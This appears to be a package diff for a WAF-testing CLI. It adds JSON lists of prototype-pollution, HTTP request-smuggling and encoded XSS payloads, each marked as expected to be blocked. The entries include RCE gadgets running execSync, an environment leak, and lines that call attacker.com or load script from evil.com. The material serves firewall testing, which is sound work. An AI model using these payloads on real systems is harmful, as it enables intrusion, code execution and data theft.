@waftester/cli 2.8.0

package/payloads/prototype-pollution.json

@@ -0,0 +1,182 @@
+[
+    {
+      "id": "proto-001",
+      "payload": "{\"__proto__\": {\"isAdmin\": true}}",
+      "tags": ["prototype-pollution", "json", "privilege-escalation"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Basic prototype pollution - add isAdmin property",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-002",
+      "payload": "{\"__proto__\": {\"admin\": true}}",
+      "tags": ["prototype-pollution", "json", "privilege-escalation"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Prototype pollution - add admin property",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-003",
+      "payload": "{\"constructor\": {\"prototype\": {\"isAdmin\": true}}}",
+      "tags": ["prototype-pollution", "json", "constructor"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Prototype pollution via constructor.prototype",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-004",
+      "payload": "?__proto__[isAdmin]=true",
+      "tags": ["prototype-pollution", "querystring"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "URL query string prototype pollution",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-005",
+      "payload": "?a[__proto__][isAdmin]=true",
+      "tags": ["prototype-pollution", "querystring", "nested"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Nested query string prototype pollution",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-006",
+      "payload": "?a[constructor][prototype][isAdmin]=true",
+      "tags": ["prototype-pollution", "querystring", "constructor"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Constructor-based query string pollution",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-007",
+      "payload": "{\"__proto__\": {\"evilProperty\": \"evilPayload\"}}",
+      "tags": ["prototype-pollution", "json"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Generic prototype pollution payload",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-008",
+      "payload": "{\"__proto__\": {\"shell\": \"node\", \"NODE_OPTIONS\": \"--inspect=attacker.com\"}}",
+      "tags": ["prototype-pollution", "nodejs", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "NodeJS prototype pollution RCE via NODE_OPTIONS",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-009",
+      "payload": "{\"__proto__\": {\"argv0\": \"node\", \"shell\": \"node\", \"NODE_OPTIONS\": \"--inspect=payload\"}}",
+      "tags": ["prototype-pollution", "nodejs", "rce", "async"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "NodeJS async hook prototype pollution RCE",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-010",
+      "payload": "{\"__proto__\": {\"outputFunctionName\": \"x;process.mainModule.require('child_process').execSync('id');s\"}}",
+      "tags": ["prototype-pollution", "ejs", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "EJS gadget prototype pollution RCE",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-011",
+      "payload": "{\"__proto__\": {\"escapeFunction\": \"(() => {})//\"}}",
+      "tags": ["prototype-pollution", "ejs", "rce"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "EJS escapeFunction gadget",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-012",
+      "payload": "{\"__proto__\": {\"client\": true, \"escapeFunction\": \"1;return process.env\"}}",
+      "tags": ["prototype-pollution", "ejs", "info-disclosure"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "EJS prototype pollution environment leak",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-013",
+      "payload": ".es(*).props(label.__proto__.env.AAAA='require(\"child_process\").exec(\"id\")')",
+      "tags": ["prototype-pollution", "kibana", "cve-2019-7609"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Kibana CVE-2019-7609 prototype pollution RCE",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-014",
+      "payload": "{\"__proto__\": {\"parameterLimit\": 1}}",
+      "tags": ["prototype-pollution", "express", "dos"],
+      "expected_block": true,
+      "severity_hint": "medium",
+      "notes": "ExpressJS prototype pollution detection",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-015",
+      "payload": "{\"__proto__\": {\"status\": 510}}",
+      "tags": ["prototype-pollution", "express", "detection"],
+      "expected_block": true,
+      "severity_hint": "medium",
+      "notes": "ExpressJS response status pollution",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-016",
+      "payload": "__proto__[polluted]=true",
+      "tags": ["prototype-pollution", "form-data"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Form data prototype pollution",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-017",
+      "payload": "constructor.prototype.polluted=true",
+      "tags": ["prototype-pollution", "form-data", "constructor"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Form data constructor pollution",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-018",
+      "payload": "{\"__proto__\": {\"allowedHosts\": \"all\"}}",
+      "tags": ["prototype-pollution", "webpack", "bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Webpack dev server prototype pollution",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-019",
+      "payload": "?__proto__.onerror=alert(1)",
+      "tags": ["prototype-pollution", "xss", "dom"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Client-side prototype pollution to XSS",
+      "category": "Deserialization"
+    },
+    {
+      "id": "proto-020",
+      "payload": "?__proto__[innerHTML]=<img/src/onerror=alert(1)>",
+      "tags": ["prototype-pollution", "xss", "dom"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Prototype pollution innerHTML XSS gadget",
+      "category": "Deserialization"
+    }
+]

package/payloads/request-smuggling.json

@@ -0,0 +1,182 @@
+[
+    {
+      "id": "smuggle-001",
+      "payload": "Transfer-Encoding: chunked",
+      "tags": ["request-smuggling", "header", "chunked"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Transfer-Encoding header - used in smuggling attacks",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-002",
+      "payload": "Transfer-Encoding: xchunked",
+      "tags": ["request-smuggling", "header", "obfuscation"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "TE.TE obfuscation - malformed chunked",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-003",
+      "payload": "Transfer-Encoding : chunked",
+      "tags": ["request-smuggling", "header", "obfuscation"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "TE.TE obfuscation - space before colon",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-004",
+      "payload": " Transfer-Encoding: chunked",
+      "tags": ["request-smuggling", "header", "obfuscation"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "TE.TE obfuscation - leading space",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-005",
+      "payload": "Transfer-Encoding:\tchunked",
+      "tags": ["request-smuggling", "header", "obfuscation"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "TE.TE obfuscation - tab separator",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-006",
+      "payload": "X: X\nTransfer-Encoding: chunked",
+      "tags": ["request-smuggling", "header", "newline"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "TE.TE obfuscation - newline before TE",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-007",
+      "payload": "Transfer-Encoding\n: chunked",
+      "tags": ["request-smuggling", "header", "obfuscation"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "TE.TE obfuscation - newline in header name",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-008",
+      "payload": "0\r\n\r\nGET /admin HTTP/1.1\r\nHost: target.com\r\n\r\n",
+      "tags": ["request-smuggling", "cl-te", "request-injection"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "CL.TE smuggled request to /admin",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-009",
+      "payload": "0\r\n\r\nPOST /admin HTTP/1.1\r\nHost: target.com\r\nContent-Length: 10\r\n\r\ndata=evil",
+      "tags": ["request-smuggling", "cl-te", "post-injection"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "CL.TE smuggled POST request",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-010",
+      "payload": "Content-Length: 0\r\nTransfer-Encoding: chunked",
+      "tags": ["request-smuggling", "cl-te", "headers"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "CL.TE conflicting headers",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-011",
+      "payload": "Transfer-Encoding: chunked\r\nContent-Length: 4",
+      "tags": ["request-smuggling", "te-cl", "headers"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "TE.CL conflicting headers",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-012",
+      "payload": "Transfer-Encoding: chunked\r\nTransfer-Encoding: identity",
+      "tags": ["request-smuggling", "te-te", "duplicate"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "TE.TE duplicate Transfer-Encoding headers",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-013",
+      "payload": "Transfer-Encoding: chunked, identity",
+      "tags": ["request-smuggling", "te-te", "multiple-values"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "TE.TE multiple values in single header",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-014",
+      "payload": "Transfer-Encoding: chunk",
+      "tags": ["request-smuggling", "te-te", "truncated"],
+      "expected_block": true,
+      "severity_hint": "medium",
+      "notes": "TE.TE truncated value",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-015",
+      "payload": "Foo: bar\r\n\r\nGET / HTTP/1.1\r\nHost: smuggled.com",
+      "tags": ["request-smuggling", "header-injection"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "HTTP/2 downgrade request smuggling",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-016",
+      "payload": "GET / HTTP/1.1\r\nHost: target.com\r\nContent-Length: 50\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nGET /evil HTTP/1.1\r\nHost: evil.com\r\n\r\n",
+      "tags": ["request-smuggling", "full-request"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Complete request smuggling payload",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-017",
+      "payload": "GPOST / HTTP/1.1",
+      "tags": ["request-smuggling", "method-confusion"],
+      "expected_block": true,
+      "severity_hint": "medium",
+      "notes": "Method confusion attack (GPOST)",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-018",
+      "payload": "Content-Length: 6\r\nContent-Length: 100",
+      "tags": ["request-smuggling", "duplicate-cl"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Duplicate Content-Length headers",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-019",
+      "payload": "Content-Length : 6",
+      "tags": ["request-smuggling", "cl-obfuscation"],
+      "expected_block": true,
+      "severity_hint": "medium",
+      "notes": "Content-Length with space before colon",
+      "category": "Protocol"
+    },
+    {
+      "id": "smuggle-020",
+      "payload": "fetch('/', {method:'POST',body:'0\\r\\n\\r\\nGET /admin HTTP/1.1\\r\\nHost: x\\r\\n\\r\\n'})",
+      "tags": ["request-smuggling", "client-side", "desync"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "Client-side desync attack via fetch",
+      "category": "Protocol"
+    }
+]

package/payloads/version.json

@@ -0,0 +1,28 @@
+{
+  "version": "4.0.0",
+  "last_updated": "2025-01-22T10:00:00Z",
+  "update_type": "major",
+  "source": "enterprise-repositories-deep-audit",
+  "description": "Deep audit expansion from PayloadsAllTheThings: 2,822 payloads with WAF-specific bypasses",
+  "payload_counts": {
+    "injection": 602,
+    "xss": 298,
+    "traversal": 188,
+    "auth": 362,
+    "ssrf": 230,
+    "protocol": 130,
+    "graphql": 60,
+    "cache": 60,
+    "logic": 147,
+    "deserialization": 60,
+    "fuzz": 290,
+    "ai": 46,
+    "media": 33,
+    "rate_limit": 51,
+    "services": 100,
+    "waf_validation": 221
+  },
+  "total_payloads": 2822,
+  "total_tests": 2822,
+  "notes": "v4.0.0 additions (+302): Cloud metadata SSRF bypasses (AWS/GCP/Azure/Oracle/DO/Hetzner/k8s encoding), XXE advanced (Billion Laughs, XSLT RCE, SVG/SOAP/Office XXE), LFI encoding (base64, UNC paths, mixed slashes, semicolon bypass), CSP bypass (JSONP Google/YouTube/Blogger/Yandex/VK/Uber), WAF-specific bypasses (Cloudflare/Akamai/Incapsula/Fortiweb/WordFence/Imperva), DNS rebinding (1u.ms, IPv6 mapped, URL parser confusion), Open redirect Unicode/CRLF/punycode/hex-IP bypasses"
+}

package/payloads/xss-advanced.json

@@ -0,0 +1,227 @@
+[
+    {
+      "id": "xss-adv-001",
+      "payload": "<script>\\u0061\\u006C\\u0065\\u0072\\u0074(1)</script>",
+      "tags": ["xss", "unicode-escape", "bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS with Unicode escape sequences for 'alert'",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-002",
+      "payload": "\\uFF1Cscript\\uFF1Ealert(1)\\uFF1C/script\\uFF1E",
+      "tags": ["xss", "fullwidth", "bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS with fullwidth characters for < and >",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-003",
+      "payload": "%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E",
+      "tags": ["xss", "utf32", "bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS with UTF-32 encoding",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-004",
+      "payload": "+ADw-script+AD4-alert(1)+ADw-/script+AD4-",
+      "tags": ["xss", "utf7", "bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS with UTF-7 encoding",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-005",
+      "payload": "<a href=\"j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;\">X</a>",
+      "tags": ["xss", "html-entities", "cloudflare-bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Cloudflare bypass using HTML entities and whitespace",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-006",
+      "payload": "゙ア='',゙セ=!゙ア+゙ア,゙エ=!゙セ+゙ア,゙ソ=゙ア+{},゙ト=゙セ[゙ア++]",
+      "tags": ["xss", "katakana", "bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "JSFuck-style XSS using Katakana characters",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-007",
+      "payload": "𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{}",
+      "tags": ["xss", "cuneiform", "bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS using Cuneiform script characters",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-008",
+      "payload": "ᨒ='',ᨕ=!ᨒ+ᨒ,ᨖ=!ᨕ+ᨒ,ᨘ=ᨒ+{}",
+      "tags": ["xss", "lontara", "bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS using Lontara script characters",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-009",
+      "payload": "<img src=x onerror=`alert\\`1\\``>",
+      "tags": ["xss", "template-literal", "es6"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS using ES6 template literals",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-010",
+      "payload": "<img src=x onerror=alert?.(`1`)>",
+      "tags": ["xss", "optional-chaining", "es2020"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS using ES2020 optional chaining",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-011",
+      "payload": "<img src=x onerror=\\141\\154\\145\\162\\164(1)>",
+      "tags": ["xss", "octal-escape", "bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS with octal-encoded 'alert'",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-012",
+      "payload": "<form id=x><output id=y>XSS</output>",
+      "tags": ["xss", "dom-clobbering", "form"],
+      "expected_block": true,
+      "severity_hint": "medium",
+      "notes": "DOM clobbering via form/output elements",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-013",
+      "payload": "<a id=x><a id=x name=y href=\"javascript:alert(1)\">",
+      "tags": ["xss", "dom-clobbering", "collection"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "DOM clobbering via DOM collection",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-014",
+      "payload": "<iframe name=a srcdoc=\"<iframe srcdoc='<a/id=c/name=d/href=http://evil.com>'></iframe>\">",
+      "tags": ["xss", "dom-clobbering", "nested-iframe"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Deep DOM clobbering via nested iframes",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-015",
+      "payload": "<script src=\"data:text/javascript,alert(1)\"></script>",
+      "tags": ["xss", "data-uri", "csp-bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS via data: URI script src",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-016",
+      "payload": "<meta http-equiv=\"refresh\" content=\"0;url=javascript:alert(1)\">",
+      "tags": ["xss", "meta-refresh", "bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS via meta refresh to javascript:",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-017",
+      "payload": "f=document.createElement(\"iframe\");f.src=\"/robots.txt\";f.onload=()=>{x=document.createElement('script');x.src='//evil.com/xss.js';f.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);",
+      "tags": ["xss", "csp-bypass", "iframe"],
+      "expected_block": true,
+      "severity_hint": "critical",
+      "notes": "CSP bypass via iframe contentWindow",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-018",
+      "payload": "/?xss=<script>alert(1)</script>&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a&a",
+      "tags": ["xss", "csp-bypass", "parameter-limit"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "PHP CSP bypass via max_input_vars (1000 params)",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-019",
+      "payload": "<object data=\"javascript:alert(1)\">",
+      "tags": ["xss", "object-tag"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS via object tag data attribute",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-020",
+      "payload": "<svg><use href=\"data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script></svg>#x\">",
+      "tags": ["xss", "svg-use", "data-uri"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS via SVG use element with data URI",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-021",
+      "payload": "<math><mtext><table><mglyph><style><img src=x onerror=alert(1)>",
+      "tags": ["xss", "mathml", "html-smuggling"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS via MathML HTML smuggling",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-022",
+      "payload": "<noscript><p title=\"</noscript><img src=x onerror=alert(1)>\">",
+      "tags": ["xss", "noscript", "parser-trick"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS via noscript parser differential",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-023",
+      "payload": "<!--><script>alert(1)/*-->*/</script>",
+      "tags": ["xss", "html-comment", "bypass"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS via HTML comment trick",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-024",
+      "payload": "javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+alert(1)//'>",
+      "tags": ["xss", "polyglot"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "Multi-context XSS polyglot",
+      "category": "XSS"
+    },
+    {
+      "id": "xss-adv-025",
+      "payload": "'-alert(1)-'",
+      "tags": ["xss", "js-context", "string-escape"],
+      "expected_block": true,
+      "severity_hint": "high",
+      "notes": "XSS in JavaScript string context",
+      "category": "XSS"
+    }
+]